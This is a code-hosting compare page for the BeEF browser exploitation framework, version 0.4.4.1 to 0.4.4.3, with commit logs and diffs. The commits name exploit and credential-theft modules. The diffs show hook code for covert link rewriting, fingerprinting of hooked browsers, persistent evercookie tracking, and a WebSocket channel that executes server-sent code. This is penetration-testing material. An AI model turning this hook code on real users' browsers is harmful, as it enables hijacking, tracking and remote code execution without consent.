Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Hiddenden:beef-0.4.4.1
Branches Tags
Hiddenden:master Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1
..
compare: Hiddenden:beef-0.4.4.3
Branches Tags
Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:master Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1

93 Commits
beef-0.4.4 ... beef-0.4.4

Author SHA1 Message Date
Christian Frichot
26933fe146 Fix for #826. Plus - logs also include a column for which browser an event is associated with 2013-03-29 13:33:09 +08:00
bcoles
9ca50e0505 Comment out two console.log() lines in hookChildFrames 2013-03-29 15:16:56 +10:30
Christian Frichot
31e1ddddaf New Defacement Module - but only rewrites targeted content. #861 2013-03-25 19:33:38 +08:00
Christian Frichot
7e57313e21 New Link Rewrite (Hidden using overwritten click handling) module. #860 2013-03-25 19:26:59 +08:00
BWZ
c0f0735150 LiveCD config files and splash logo 2013-03-25 12:08:25 +10:00
BWZ
39bc121b76 LiveCD - Added IP Address to GUI when ssh enabled 2013-03-25 11:29:02 +10:00
BWZ
dc4665e1d3 LiveCD - Updated URI + Version + MD5 2013-03-25 11:21:00 +10:00
Brendan Coles
497c3eb3f3 Merge pull request #859 from gcattani/ApacheCookieDisclosure 
Module: Apache HTTP Server cookie disclosure (exploit)
 2013-03-19 11:22:59 -07:00
gcatt
6abb21ac53 Module: Apache HTTP Server cookie disclosure (exploit) 2013-03-19 17:29:48 +01:00
bcoles
fb26ef5f71 Add beef.browser.hookChildFrames() 
BeEF now automatically hooks all same-domain child (i)frames

Allows logging of child frame events - fixes issue #493
 2013-03-18 00:37:15 +10:30
bcoles
c98d9a4300 Manually merged Windows Media Player detection from @gcattani 
Fix issue #833

Fix issue #847
 2013-03-17 03:30:12 +10:30
bcoles
f3f624e9a4 Fixed bug introduced in commit 8132eb0e53 2013-03-17 03:21:38 +10:30
bcoles
8132eb0e53 Solution: Hide beef behind an apache webserver 
Manually merge code from @lalaglubsch

Add support for BeEF through a proxy

Fix issue #856
 2013-03-16 20:12:27 +10:30
antisnatchor
7364529b26 Merge branch 'master' of https://github.com/beefproject/beef 2013-03-12 10:57:16 +00:00
antisnatchor
de1de356f7 Added GoogleWebStore module.rb option. Modified link opener to support data URI injections. 2013-03-12 10:57:07 +00:00
Brendan Coles
4cec0cb1b8 Merge pull request #855 from javuto/829-Foxit-reader-plugin-detection 
Detection added for the Foxit Reader plugin, fixes #829
 2013-03-10 21:44:07 -07:00
Javier Marcos
657aac9dcd Detection added for the Foxit Reader plugin, fixes #829 2013-03-11 00:19:19 +00:00
bmantra
2d710a1bcf Merge pull request #853 from bmantra/master 
add fingerprint of m0n0wall to internal network fingerprint module
 2013-03-08 12:03:07 -08:00
bmantra
2484704fe8 add fingerprint for m0n0wall 2013-03-08 21:00:52 +01:00
Michele Orru
7ad93130d9 Merge pull request #852 from bmantra/master 
Added m0n0wall 1.33 CSRF root reverse shell exploit #824
 2013-03-07 08:45:42 -08:00
bmantra
de2bd15769 module for m0n0wall csrf reverse root shell #824 2013-03-06 19:34:27 +01:00
antisnatchor
713a20f157 Replaced eval with new Function when executing data coming from BeEF's WebSocket server. 2013-03-05 10:37:49 +00:00
antisnatchor
6a968e77c0 Removed all the crappy Oracle code to detect if java is enabled. Was preventing x-domain hooking on FF. 2013-03-04 22:07:47 +00:00
antisnatchor
710769283e Merge branch 'master' of https://github.com/beefproject/beef 2013-03-03 11:26:29 +00:00
antisnatchor
b4d690a5f3 det_visited_domains now supports also Opera. 2013-03-03 11:26:00 +00:00
antisnatchor
4e7b983bd3 Added support for Chrome 25. 2013-03-03 11:24:08 +00:00
qswain2
0ea1c0bbf8 Add chrome/opera support to get_visited_domains 
Added chrome/opera support for lcamtuf cache timing script
in get_visited_domains module.

Signed-off-by: antisnatchor <antisnatchor@gmail.com>
 2013-03-03 11:16:07 +00:00
Michele Orru
58fb939b96 Merge pull request #848 from claudijd/add_dot_rvmrc_to_dot_gitignore 
Add .rvmrc to .gitignore
 2013-03-03 00:16:53 -08:00
Jonathan Claudius
6f035bdf05 Add .rvmrc to .gitignore 2013-03-02 17:32:44 -06:00
bcoles
83749aad08 Add support for Firefox 20 2013-02-26 13:17:14 +10:30
bcoles
127e3cc0bb Updated version 2013-02-26 12:08:05 +10:30
Brendan Coles
ed661e2a22 Merge pull request #845 from bcoles/raw_http 
Add 'bind_raw' to asset handler
 2013-02-22 23:21:40 -08:00
bcoles
0d8521dd7b Add 'bind_raw' to asset handler 2013-02-23 16:57:47 +10:30
bcoles
bf2dc1d387 Remove redundant line 2013-02-23 15:27:54 +10:30
bcoles
8f1a26ffa9 Add "Hardware" to console browser details 2013-02-23 15:27:29 +10:30
bcoles
de1ab2d1f9 Fix issue #838 
Fixes detect_toolbars target configuration
 2013-02-23 12:32:57 +10:30
bcoles
772b2fd1e7 Add VLC details to hooked browser balloon popup 
Part of issue #828
 2013-02-22 12:14:43 +10:30
Brendan Coles
765c834f78 Merge pull request #844 from Nbblrr/master 
Plugin for VLC detection (ticket #828)
 2013-02-21 17:58:55 -08:00
Nbblrr
7eec331cf9 Plugin for VLC detection #828 2013-02-21 23:14:28 +01:00
Wade Alcorn
1c252af145 Updated version number to make explicit the patched Rack::File xss fix 2013-02-21 21:10:24 +10:00
antisnatchor
5a15a9afdd Merge remote-tracking branch 'origin/master' 2013-02-20 11:58:11 +00:00
antisnatchor
c37f0e1719 Patched Rack::File to don't reflect the URI path in the page if a file is not found. Official patch is not out yet. 2013-02-20 11:57:37 +00:00
bcoles
0734bb0750 Update Proxy tab 2013-02-20 00:57:53 +10:30
bcoles
4718075b2c Add Yammer template to Pretty Theft module 2013-02-19 16:01:10 +10:30
bcoles
514f367803 Merge branch 'master' of https://github.com/beefproject/beef 2013-02-19 15:20:02 +10:30
bcoles
753a78f5fc Add YouTube template to Pretty Theft module 2013-02-19 15:19:27 +10:30
antisnatchor
c222d0e4e3 Patched BeEF hook core to support injection when the hooked domain uses HttpOnly. 2013-02-18 17:19:49 +00:00
Brendan Coles
5e257d4e33 Merge pull request #843 from gcattani/834-hasRealPlayer 
Add RealPlayer detection
 2013-02-17 08:30:40 -08:00
gcatt
007769aa93 Corrected mistake 2013-02-17 12:41:30 +01:00
gcatt
63695e66d7 Add RealPlayer detection 2013-02-17 12:37:56 +01:00
antisnatchor
074a11c85a Updated Chrome sample extension with latest requirements (CSP/version/etc.). Not it works on latest Chrome. Also Updated the fake_flash_update description with more info. 2013-02-12 10:53:19 +00:00
Brendan Coles
88086811a0 Merge pull request #842 from bcoles/isTouchEnabled 
Add beef.hardware.isTouchEnabled()
 2013-02-10 08:57:53 -08:00
bcoles
90174dda23 Add beef.hardware.isTouchEnabled() 2013-02-11 02:46:35 +10:30
bmantra
fa7b90f123 Merge pull request #840 from bmantra/master 
Metasploit auto launcher not supported on windows
 2013-02-06 10:53:36 -08:00
bmantra
17aa898099 correct last commit, set auto_msfrpcd back to false 2013-02-06 19:42:14 +01:00
bmantra
f879584f1b changed windows default path and changed message 2013-02-06 19:37:31 +01:00
bmantra
2d27266fc9 added message that metasploit auto launch is not available on MS Windows 2013-02-06 19:22:12 +01:00
bcoles
2d08183eef Refactor 'select_zombie_summary' 
extensions/admin_ui/controllers/modules/modules.rb
    extensions/console/lib/shellinterface.rb

Fix issue #837
 2013-02-07 02:44:40 +10:30
bcoles
bf19223a01 Add 'HasQuickTime' to core/main/handlers/browserdetails.rb 2013-02-07 02:43:58 +10:30
bcoles
11a56c5ce9 Add hasQuickTime to browser object 2013-02-05 01:41:21 +10:30
antisnatchor
4852cab66d Properly adjusted onClose command module to annoy the user also in latest Firefox. 2013-02-04 12:09:46 +00:00
bcoles
79e8f34b06 Add QuickTime to zombie balloon details 
Add 'modules/browser/detect_quicktime'
 2013-02-04 09:10:59 +10:30
radoen
4003b69646 Update core/main/client/browser.js 2013-02-03 12:32:25 +01:00
radoen
ad2a93fc60 Merge branch 'master' of github.com:beefproject/beef 2013-02-03 11:30:37 +01:00
radoen
4e73163403 ISSUES #817 
to refine UI rendering.

Note In FF 21.xx the old detection method correctly work yet
 2013-02-03 01:45:01 +01:00
bcoles
19d1827c36 Add 'Steal Autocomplete' module 
Part of issue #601
 2013-02-03 08:51:04 +10:30
radoen
fdf3dff690 ISSUES #817 
to refine UI rendering.

Note In FF 21.xx the old detection method correctly work yet
 2013-02-02 22:07:28 +01:00
bcoles
f7b55be03a Add 'beef.browser.hasQuickTime()' 
Merged manually from https://github.com/beefproject/beef/pull/836

Fix issue #835

starting
 2013-02-03 05:59:06 +10:30
bcoles
ce1cc61ac1 Add ActiveX and Silverlight to zombie balloon details 2013-02-03 05:47:07 +10:30
bcoles
8b56a147a9 Rename 'System Platform' to 'Browser Platform' in UI 2013-02-03 05:28:49 +10:30
bcoles
449c6633aa Rename 'System Platform' to 'Browser Platform' 2013-02-03 05:24:48 +10:30
bcoles
95970d5364 Add 'beef.browser.hasSilverlight()' 
Add 'modules/browser/detect_silverlight'
 2013-02-03 04:42:13 +10:30
bcoles
2c10dd040c Add 'beef.hardware.isLaptop()' 2013-02-03 03:55:14 +10:30
bcoles
cdc92f084e Add laptop icon 2013-02-03 03:41:29 +10:30
bcoles
15a502bce6 Add CPU type to browser initialization 
Add support for Firefox 19
 2013-02-03 03:39:30 +10:30
bcoles
10bdcce34a Fix typos in 'beef.hardware.cpuType()' and OS detection 2013-02-03 03:36:41 +10:30
bcoles
7dc1882427 Add virtual machine icon to browser 
'BeEF::Core::Models::BrowserDetails::hw_icon()'
 2013-02-03 03:02:27 +10:30
bcoles
78162e6d26 Add 'beef.hardware.cpuType()' 2013-02-03 03:01:54 +10:30
bcoles
6913e97e2e Update Windows OS detection 
Add functions:
  beef.os.isWinCE()
  beef.os.isWin2000SP1()
  beef.os.isWindows()
 2013-02-03 03:01:18 +10:30
Wade Alcorn
0df85344f0 Changed ActiveX detection slightly 2013-02-01 07:11:53 +10:00
bcoles
c88a2bb8e3 Update 'Detect Virtual Machine' module 2013-02-01 04:32:16 +10:30
bcoles
e3dced8a9e Add virtual machine icon 2013-02-01 04:30:25 +10:30
bcoles
30171693ff Add 'beef.hardware.isVirtualMachine()' 
Rename 'beef.hardware.getMobileName()' to 'beef.hardware.getName()'
 2013-02-01 04:29:06 +10:30
bcoles
065276932c Add os_fingerprinting module 2013-02-01 02:51:45 +10:30
bcoles
61d0bf2e14 Add beef.browser.hasActiveX() 
Add modules/browser/detect_activex module

Fix issue #832
 2013-02-01 01:22:45 +10:30
bcoles
06221d2540 cleanup .gitignore 2013-02-01 01:06:31 +10:30
Brendan Coles
e14be26951 Merge pull request #827 from gcattani/master 
Module: Detect Toolbars
 2013-01-31 07:10:00 -08:00
gcatt
daadf59782 Module: Detect Toolbars 
Added a module to detect browser toolbars by checking the User-Agent
and the DOM
 2013-01-31 09:20:32 +01:00
bcoles
c085c2d3d7 Add detection for IE10 
Fixes issue #818
 2013-01-28 01:05:31 +10:30
bcoles
209e64a9ef Add IE 7-9 detection to browser_fingerprinting module 2013-01-28 01:02:53 +10:30
bcoles
3cb7bb9f51 Add support for Windows 8 2013-01-28 01:01:29 +10:30
bcoles
e8d85b550b Rename "Detect Chrome/Firefox Extensions" module to "Detect Extensions" 
Added placeholder for IE toolbar detection
 2013-01-27 22:35:14 +10:30
Wade Alcorn
29480a24da Version number updated 2013-01-27 14:40:16 +10:00
107 changed files with 4083 additions and 2066 deletions
Expand all files Collapse all files

7
.gitignore vendored
View File

@@ -1,3 +1,8 @@
beef.db
test/msf-test
custom-config.yaml
custom-config.yaml
.DS_Store
.gitignore
.rvmrc
*.lock

2
VERSION
View File

@@ -4,4 +4,4 @@
# See the file 'doc/COPYING' for copying permission
#
0.4.4.1-alpha
0.4.4.3-alpha

2
config.yaml
View File

@@ -6,7 +6,7 @@
# BeEF Configuration file
beef:
version: '0.4.4.1-alpha'
version: '0.4.4.3-alpha'
debug: false
restrictions:

1
core/bootstrap.rb
View File

@@ -25,6 +25,7 @@ require 'core/main/handlers/browserdetails'
# @note Include the network stack
require 'core/main/network_stack/handlers/dynamicreconstruction'
require 'core/main/network_stack/handlers/redirector'
require 'core/main/network_stack/handlers/raw'
require 'core/main/network_stack/assethandler'
require 'core/main/network_stack/api'

2617
core/main/client/browser.js
View File

File diff suppressed because one or more lines are too long

17
core/main/client/dom.js
View File

@@ -178,6 +178,23 @@ beef.dom = {
}).length;
},
/**
* Rewrites all links matched by selector to url, leveraging Bilawal Hameed's hidden click event overwriting.
* http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html
* @param: {String} url: the url to be rewritten
* @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return: {Number} the amount of links found in the DOM and rewritten.
*/
rewriteLinksClickEvents: function(url, selector) {
var sel = (selector == null) ? 'a' : selector;
return $j(sel).each(function() {
if ($j(this).attr('href') != null)
{
$j(this).click(function() {this.href=url});
}
}).length;
},
/**
* Parse all links in the page matched by the selector, replacing old_protocol with new_protocol (ex.:https with http)
* @param: {String} old_protocol: the old link protocol to be rewritten

44
core/main/client/hardware.js
View File

@@ -8,6 +8,42 @@ beef.hardware = {
ua: navigator.userAgent,
cpuType: function() {
// IE
if (typeof navigator.cpuClass != 'undefined') {
cpu = navigator.cpuClass;
if (cpu == "x86") return "32-bit";
if (cpu == "68K") return "Motorola 68K";
if (cpu == "PPC") return "Motorola PPC";
if (cpu == "Alpha") return "Digital";
if (this.ua.match('Win64; IA64')) return "64-bit (Intel)";
if (this.ua.match('Win64; x64')) return "64-bit (AMD)";
// Firefox
} else if (typeof navigator.oscpu != 'undefined') {
if (navigator.oscpu.match('(WOW64|x64|x86_64)')) return "64-bit";
}
if (navigator.platform.toLowerCase() == "win64") return "64-bit";
return "32-bit";
},
isTouchEnabled: function() {
if ('ontouchstart' in document) return true;
return false;
},
isVirtualMachine: function() {
if (screen.width % 2 || screen.height % 2) return true;
return false;
},
isLaptop: function() {
// Most common laptop screen resolution
if (screen.width == 1366 && screen.height == 768) return true;
// Netbooks
if (screen.width == 1024 && screen.height == 600) return true;
return false;
},
isNokia: function() {
return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
},
@@ -36,13 +72,13 @@ beef.hardware = {
* Returns true if the browser is on a Mobile Phone
* @return: {Boolean} true or false
*
* @example: if(beef.browser.isMobilePhone()) { ... }
* @example: if(beef.hardware.isMobilePhone()) { ... }
**/
isMobilePhone: function() {
return DetectMobileQuick();
},
getMobileName: function() {
getName: function() {
var ua = navigator.userAgent.toLowerCase();
if(DetectIphone()) { return "iPhone"};
if(DetectIpod()) { return "iPod Touch"};
@@ -78,11 +114,13 @@ beef.hardware = {
if(DetectSonyMylo()) { return "Sony Mylo"};
if(DetectAmazonSilk()) { return "Kindle Fire"};
if(DetectKindle()) { return "Kindle"};
if(DetectSonyPlaystation()) { return "Playstation" };
if(DetectSonyPlaystation()) { return "Playstation"};
if(ua.search(deviceNintendoDs) > -1) { return "Nintendo DS"};
if(ua.search(deviceWii) > -1) { return "Nintendo Wii"};
if(ua.search(deviceNintendo) > -1) { return "Nintendo"};
if(DetectXbox()) { return "Xbox"};
if(this.isLaptop()) { return "Laptop"};
if(this.isVirtualMachine()) { return "Virtual Machine"};
return 'Unknown';
}

21
core/main/client/lib/evercookie.js
View File

@@ -793,14 +793,19 @@ this.waitForSwf = function(i)
this.evercookie_cookie = function(name, value)
{
if (typeof(value) != "undefined")
{
// expire the cookie first
document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
}
else
return this.getFromStr(name, document.cookie);
try{
if (typeof(value) != "undefined")
{
// expire the cookie first
document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
}
else
return this.getFromStr(name, document.cookie);
}catch(e){
// the hooked domain is using HttpOnly, so we must set the hook ID in a different way.
// evercookie_userdata and evercookie_window will be used in this case.
}
};
// get value from param-like string (eg, "x=y&name=VALUE")

1
core/main/client/logger.js
View File

@@ -50,6 +50,7 @@ beef.logger = {
*/
start: function() {
beef.browser.hookChildFrames();
this.running = true;
var d = new Date();
this.time = d.getTime();

44
core/main/client/os.js
View File

@@ -7,9 +7,9 @@
beef.os = {
ua: navigator.userAgent,
isWin311: function() {
return (this.ua.indexOf("Win16") != -1) ? true : false;
return (this.ua.match('(Win16)')) ? true : false;
},
isWinNT4: function() {
@@ -19,18 +19,25 @@ beef.os = {
isWin95: function() {
return (this.ua.match('(Windows 95)|(Win95)|(Windows_95)')) ? true : false;
},
isWinCE: function() {
return (this.ua.match('(Windows CE)')) ? true : false;
},
isWin98: function() {
return (this.ua.match('(Windows 98)|(Win98)')) ? true : false;
},
isWinME: function() {
return (this.ua.indexOf('Windows ME') != -1) ? true : false;
return (this.ua.match('(Windows ME)|(Win 9x 4.90)')) ? true : false;
},
isWin2000: function() {
return (this.ua.match('(Windows NT 5.0)|(Windows 2000)')) ? true : false;
},
isWin2000SP1: function() {
return (this.ua.match('Windows NT 5.01 ')) ? true : false;
},
isWinXP: function() {
return (this.ua.match('(Windows NT 5.1)|(Windows XP)')) ? true : false;
@@ -47,6 +54,10 @@ beef.os = {
isWin7: function() {
return (this.ua.match('(Windows NT 6.1)|(Windows NT 7.0)')) ? true : false;
},
isWin8: function() {
return (this.ua.match('(Windows NT 6.2)')) ? true : false;
},
isOpenBSD: function() {
return (this.ua.indexOf('OpenBSD') != -1) ? true : false;
@@ -103,19 +114,26 @@ beef.os = {
isBeOS: function() {
return (this.ua.match('BeOS')) ? true : false;
},
isWindows: function() {
return this.isWin311() || this.isWinNT4() || this.isWinCE() || this.isWin95() || this.isWin98() || this.isWinME() || this.isWin2000() || this.isWin2000SP1() || this.isWinXP() || this.isWinServer2003() || this.isWinVista() || this.isWin7() || this.isWin8() || this.isWinPhone();
},
getName: function() {
//windows
if(this.isWin311()) return 'Windows 3.11';
if(this.isWinNT4()) return 'Windows NT 4';
if(this.isWin95()) return 'Windows 95';
if(this.isWin98()) return 'Windows 98';
if(this.isWinME()) return 'Windows Millenium';
if(this.isWin2000()) return 'Windows 2000';
if(this.isWinXP()) return 'Windows XP';
//Windows
if(this.isWin311()) return 'Windows 3.11';
if(this.isWinNT4()) return 'Windows NT 4';
if(this.isWinCE()) return 'Windows CE';
if(this.isWin95()) return 'Windows 95';
if(this.isWin98()) return 'Windows 98';
if(this.isWinME()) return 'Windows Millenium';
if(this.isWin2000()) return 'Windows 2000';
if(this.isWin2000SP1()) return 'Windows 2000 SP1';
if(this.isWinXP()) return 'Windows XP';
if(this.isWinServer2003()) return 'Windows Server 2003';
if(this.isWinVista()) return 'Windows Vista';
if(this.isWin7()) return 'Windows 7';
if(this.isWinVista()) return 'Windows Vista';
if(this.isWin7()) return 'Windows 7';
if(this.isWin8()) return 'Windows 8';
//Nokia
if(this.isNokia()) {

7
core/main/client/websocket.js
View File

@@ -53,9 +53,10 @@ beef.websocket = {
};
this.socket.onmessage = function (message) {
//todo: double-check if there is a way to don't use eval here. It's not a big deal,
//todo: because the eval'ed data comes from BeEF itself, so is implicitly trusted.
eval(message.data);
// Data coming from the WebSocket channel is either of String, Blob or ArrayBufferdata type.
// That's why it needs to be evaluated first. Using Function is a bit better than pure eval().
// It's not a big deal anyway, because the eval'ed data comes from BeEF itself, so it is implicitly trusted.
new Function(message.data)();
};
this.socket.onclose = function () {

2
core/main/constants/hardware.rb
View File

@@ -12,6 +12,8 @@ module Constants
module Hardware
HW_UNKNOWN_IMG = 'pc.png'
HW_VM_IMG = 'vm.png'
HW_LAPTOP_IMG = 'laptop.png'
HW_IPHONE_UA_STR = 'iPhone'
HW_IPHONE_IMG = 'iphone.jpg'
HW_IPAD_UA_STR = 'iPad'

70
core/main/handlers/browserdetails.rb
View File

@@ -168,11 +168,11 @@ module BeEF
end
# get and store the system platform
system_platform = get_param(@data['results'], 'SystemPlatform')
system_platform = get_param(@data['results'], 'BrowserPlatform')
if BeEF::Filters.is_valid_system_platform?(system_platform)
BD.set(session_id, 'SystemPlatform', system_platform)
BD.set(session_id, 'BrowserPlatform', system_platform)
else
self.err_msg "Invalid system platform returned from the hook browser's initial connection."
self.err_msg "Invalid browser platform returned from the hook browser's initial connection."
end
# get and store the hooked browser type
@@ -239,6 +239,14 @@ module BeEF
self.err_msg "Invalid value for HasGoogleGears returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasFoxit
has_foxit = get_param(@data['results'], 'HasFoxit')
if BeEF::Filters.is_valid_yes_no?(has_foxit)
BD.set(session_id, 'HasFoxit', has_foxit)
else
self.err_msg "Invalid value for HasFoxit returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasWebSocket
has_web_socket = get_param(@data['results'], 'HasWebSocket')
if BeEF::Filters.is_valid_yes_no?(has_web_socket)
@@ -255,6 +263,62 @@ module BeEF
self.err_msg "Invalid value for HasActiveX returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasSilverlight
has_silverlight = get_param(@data['results'], 'HasSilverlight')
if BeEF::Filters.is_valid_yes_no?(has_silverlight)
BD.set(session_id, 'HasSilverlight', has_silverlight)
else
self.err_msg "Invalid value for HasSilverlight returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasQuickTime
has_quicktime = get_param(@data['results'], 'HasQuickTime')
if BeEF::Filters.is_valid_yes_no?(has_quicktime)
BD.set(session_id, 'HasQuickTime', has_quicktime)
else
self.err_msg "Invalid value for HasQuickTime returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasRealPlayer
has_realplayer = get_param(@data['results'], 'HasRealPlayer')
if BeEF::Filters.is_valid_yes_no?(has_realplayer)
BD.set(session_id, 'HasRealPlayer', has_realplayer)
else
self.err_msg "Invalid value for HasRealPlayer returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasWMP
has_wmp = get_param(@data['results'], 'HasWMP')
if BeEF::Filters.is_valid_yes_no?(has_wmp)
BD.set(session_id, 'HasWMP', has_wmp)
else
self.err_msg "Invalid value for HasWMP returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasVLC
has_vlc = get_param(@data['results'], 'HasVLC')
if BeEF::Filters.is_valid_yes_no?(has_vlc)
BD.set(session_id, 'HasVLC', has_vlc)
else
self.err_msg "Invalid value for HasVLC returned from the hook browser's initial connection."
end
# get and store the value for CPU
cpu_type = get_param(@data['results'], 'CPU')
if !cpu_type.nil?
BD.set(session_id, 'CPU', cpu_type)
else
self.err_msg "Invalid value for CPU returned from the hook browser's initial connection."
end
# get and store the value for TouchEnabled
touch_enabled = get_param(@data['results'], 'TouchEnabled')
if BeEF::Filters.is_valid_yes_no?(touch_enabled)
BD.set(session_id, 'TouchEnabled', touch_enabled)
else
self.err_msg "Invalid value for TouchEnabled returned from the hook browser's initial connection."
end
# get and store whether the browser has session cookies enabled
has_session_cookies = get_param(@data['results'], 'hasSessionCookies')
if BeEF::Filters.is_valid_yes_no?(has_session_cookies)

13
core/main/handlers/hookedbrowsers.rb
View File

@@ -55,9 +55,16 @@ module Handlers
hooked_browser.lastseen = Time.new.to_i
# @note Check for a change in zombie IP and log an event
if hooked_browser.ip != request.ip
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
hooked_browser.ip = request.ip
if config.get('beef.http.use_x_forward_for') == true
if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}")
hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
end
else
if hooked_browser.ip != request.ip
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
hooked_browser.ip = request.ip
end
end
hooked_browser.count!

6
core/main/handlers/modules/beefjs.rb
View File

@@ -66,6 +66,12 @@ module BeEF
hook_session_config = BeEF::Core::Server.instance.to_h
# @note if http_host="0.0.0.0" in config ini, use the host requested by client
unless hook_session_config['beef_public'].nil?
if hook_session_config['beef_host'] != hook_session_config['beef_public']
hook_session_config['beef_host'] = hook_session_config['beef_public']
hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_host']}/, hook_session_config['beef_public'])
end
end
if hook_session_config['beef_host'].eql? "0.0.0.0"
hook_session_config['beef_host'] = req_host
hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)

4
core/main/models/browserdetails.rb
View File

@@ -103,7 +103,9 @@ module Models
def self.hw_icon(session_id)
ua_string = get(session_id, 'BrowserReportedName')
hardware = get(session_id, 'Hardware')
return BeEF::Core::Constants::Hardware::HW_VM_IMG if hardware =~ /Virtual Machine/
return BeEF::Core::Constants::Hardware::HW_LAPTOP_IMG if hardware =~ /Laptop/
return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil?
return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR

18
core/main/network_stack/assethandler.rb
View File

@@ -38,6 +38,24 @@ module Handlers
url
end
# Binds raw HTTP to a mount point
# @param [Integer] status HTTP status code to return
# @param [String] headers HTTP headers as a JSON string to return
# @param [String] body HTTP body to return
# @param [String] path URL path to mount the asset to TODO (can be nil for random path)
# @todo @param [Integer] count The amount of times the asset can be accessed before being automatically unbinded (-1 = unlimited)
def bind_raw(status, header, body, path=nil, count=-1)
url = build_url(path,nil)
@allocations[url] = {}
@http_server.mount(
url,
BeEF::Core::NetworkStack::Handlers::Raw.new(status, header, body)
)
@http_server.remap
print_info "Raw HTTP bound to url [" + url + "]"
url
end
# Binds a file to a mount point
# @param [String] file File path to asset
# @param [String] path URL path to mount the asset to (can be nil for random path)

33
core/main/network_stack/handlers/raw.rb Normal file
View File

@@ -0,0 +1,33 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module NetworkStack
module Handlers
class Raw
def initialize(status, header={}, body)
@status = status
@header = header
@body = body
end
def call(env)
[@status, @header, @body]
end
private
@request
@response
end
end
end
end
end

20
core/main/rest/handlers/hookedbrowsers.rb
View File

